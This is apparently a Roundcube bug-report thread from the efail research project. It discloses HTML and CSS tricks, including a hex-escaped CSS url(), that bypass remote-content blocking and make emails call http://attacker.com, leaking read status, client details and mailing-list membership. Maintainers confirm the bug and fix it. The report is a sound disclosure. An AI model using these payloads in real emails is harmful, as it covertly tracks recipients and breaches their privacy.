HTML Backchannels in Roundcube Bypass Remote Content Blocking

[jensvoid]

In the scope of academic research within the efail project, in cooperation with Ruhr-University Bochum and FH Münster, Germany we systematically analyzed Roundcube for `web bugs' and other backchannels which have an impact on the user's privacy. The results are as follows.

Introduction

It is well known that spammers abuse `web bugs' -- 1x1 pixel images in HTML emails -- to track if their mails to a certain address are actually read. To respect the privacy of their customers most email clients, by default, block external content. However, we found bypasses for remote content blocking in Roundcube.

The Impact

The issue allows the sender of an email to leak information such as:

• if and when the mail has been read
• user's mail client and OS (via HTTP headers)
• the number of users on a non-public mailing list

The Bypasses

The following bypasses to remote content blocking have been found:

<image src="http://attacker.com">

<style>body {background-image: \75 \72 \6C ('http://attacker.com');}</style>

(Credits for this one go to https://github.com/cure53/HTTPLeaks/)

[alecpl]

Confirmed both with git-master.

[alecpl]

Fixed.